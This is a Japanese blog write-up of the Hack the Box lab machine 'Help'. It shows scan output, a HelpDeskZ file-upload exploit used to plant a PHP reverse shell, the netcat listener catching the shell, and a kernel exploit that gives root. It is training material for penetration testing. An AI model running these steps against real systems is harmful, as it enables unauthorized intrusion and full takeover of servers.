This page looks best with JavaScript enabled

【Hack the Box write-up】Help

 ·   ·  ☕ 2 min read  ·  ✍️ さんぽし

はじめに

筆者は Hack the Box 初心者です。
何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。
さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。
github | sanposhiho/MY_CHEAT_SHEET

machineについて

難易度は easy です

スクリーンショット 2020-07-14 8.29.02.png

nmap

# Nmap 7.80 scan initiated Sun Jul 12 12:45:09 2020 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /home/kali/results/10.10.10.121/scans/_quick_tcp_nmap.txt -oX /home/kali/results/10.10.10.121/scans/xml/_quick_tcp_nmap.xml 10.10.10.121                                                                                                                                                                                                                                      
Nmap scan report for 10.10.10.121
Host is up, received user-set (0.27s latency).
Scanned at 2020-07-12 12:45:09 EDT for 39s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZY4jlvWqpdi8bJPUnSkjWmz92KRwr2G6xCttorHM8Rq2eCEAe1ALqpgU44L3potYUZvaJuEIsBVUSPlsKv+ds8nS7Mva9e9ztlad/fzBlyBpkiYxty+peoIzn4lUNSadPLtYH6khzN2PwEJYtM/b6BLlAAY5mDsSF0Cz3wsPbnu87fNdd7WO0PKsqRtHpokjkJ22uYJoDSAM06D7uBuegMK/sWTVtrsDakb1Tb6H8+D0y6ZQoE7XyHSqD0OABV3ON39GzLBOnob4Gq8aegKBMa3hT/Xx9Iac6t5neiIABnG4UP03gm207oGIFHvlElGUR809Q9qCJ0nZsup4bNqa/
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHINVMyTivG0LmhaVZxiIESQuWxvN2jt87kYiuPY2jyaPBD4DEt8e/1kN/4GMWj1b3FE7e8nxCL4PF/lR9XjEis=
|   256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHxDPln3rCQj04xFAKyecXJaANrW3MBZJmbhtL4SuDYX
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    syn-ack Node.js Express framework
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 12 12:45:48 2020 -- 1 IP address (1 host up) scanned in 39.33 seconds

gobuster

/.hta (Status: 403) [Size: 291]                                                                                                                                                                                                            
/.hta.txt (Status: 403) [Size: 295]                                                                                                                                                                                                        
/.hta.html (Status: 403) [Size: 296]                                                                                                                                                                                                       
/.hta.php (Status: 403) [Size: 295]                                                                                                                                                                                                        
/.hta.asp (Status: 403) [Size: 295]                                                                                                                                                                                                        
/.hta.aspx (Status: 403) [Size: 296]                                                                                                                                                                                                       
/.hta.jsp (Status: 403) [Size: 295]                                                                                                                                                                                                        
/.htaccess (Status: 403) [Size: 296]                                                                                                                                                                                                       
/.htaccess.txt (Status: 403) [Size: 300]                                                                                                                                                                                                   
/.htaccess.html (Status: 403) [Size: 301]                                                                                                                                                                                                  
/.htaccess.php (Status: 403) [Size: 300]                                                                                                                                                                                                   
/.htaccess.asp (Status: 403) [Size: 300]                                                                                                                                                                                                   
/.htaccess.aspx (Status: 403) [Size: 301]                                                                                                                                                                                                  
/.htaccess.jsp (Status: 403) [Size: 300]                                                                                                                                                                                                   
/.htpasswd (Status: 403) [Size: 296]                                                                                                                                                                                                       
/.htpasswd.aspx (Status: 403) [Size: 301]                                                                                                                                                                                                  
/.htpasswd.jsp (Status: 403) [Size: 300]                                                                                                                                                                                                   
/.htpasswd.txt (Status: 403) [Size: 300]                                                                                                                                                                                                   
/.htpasswd.html (Status: 403) [Size: 301]                                                                                                                                                                                                  
/.htpasswd.php (Status: 403) [Size: 300]                                                                                                                                                                                                   
/.htpasswd.asp (Status: 403) [Size: 300]                                                                                                                                                                                                   
/index.html (Status: 200) [Size: 11321]                                                                                                                                                                                                    
/index.html (Status: 200) [Size: 11321]                                                                                                                                                                                                    
/javascript (Status: 301) [Size: 317]                                                                                                                                                                                                      
/server-status (Status: 403) [Size: 300]                                                                                                                                                                                                   
/support (Status: 301) [Size: 314]  

/support

スクリーンショット 2020-07-14 8.28.46.png

searchsploit

kali@kali:~$ searchsploit HelpDeskZ
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload                                                                                                                                                           | exploits/php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download                                                                                                                    | exploits/php/webapps/41200.py
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

HelpDeskZ 1.0.2 - Arbitrary File Upload

https://www.exploit-db.com/exploits/40300
これを使用します、が、「php ファイルが Upload できるので hogehoge」って書いてあるけど、

スクリーンショット 2020-07-14 9.22.50.png
File not allowed って出るけど〜〜〜〜

ソースを覗いてみると

https://github.com/evolutionscript/HelpDeskZ-1.0/blob/006662bb856e126a38f2bb76df44a2e4e3d37350/includes/parser/new_ticket.php#L77-L86

verifyAttachment のファイルの validation を弾き切っていません。(php 読めないのであってるか分からん
https://github.com/evolutionscript/HelpDeskZ-1.0/blob/006662bb856e126a38f2bb76df44a2e4e3d37350/includes/functions.php#L117

なのでエラーは出てるけど Upload はできてるってことなのかな?と思って、それを前提に進めます

ちなみに Upload したのはこいつです↓
https://github.com/pentestmonkey/php-reverse-shell

kali@kali:~$ python2 exp.py http://10.10.10.121/support php-reverse-shell.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
Sorry, I did not find anything

むむむ
スクリプトの range の範囲を広げて(-300~1000 にした)再試行します

kali@kali:~$ python2 exp.py http://10.10.10.121/support/uploads/tickets/ php-reverse-shell.php 
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://10.10.10.121/support/uploads/tickets/4fd7e5431d6ab1a9e54f1f1ea9cc010b.php
kali@kali:~$ 

天才だった

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.121] 42172
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 17:44:31 up  2:00,  0 users,  load average: 0.07, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "__import__('pty').spawn('/bin/bash')"
help@help:/$ 

user が取れました

PE

help@help:/$ uname -a
uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

https://www.exploit-db.com/exploits/44298

Kernel Exploit が使えそうです

help@help:/tmp$ ./a.out
./a.out
task_struct = ffff880039f2aa00
uidptr = ffff880036ba4c04
spawning root shell

root@help:/tmp# whoami
whoami
root

一瞬で root が取れました

終わりに

最近ここにかくコメントがない〜〜〜

3000 番の nodejs はなんだったんだ?

Share on

さんぽし
WRITTEN BY
さんぽし
Web Developer /w Elixir, Go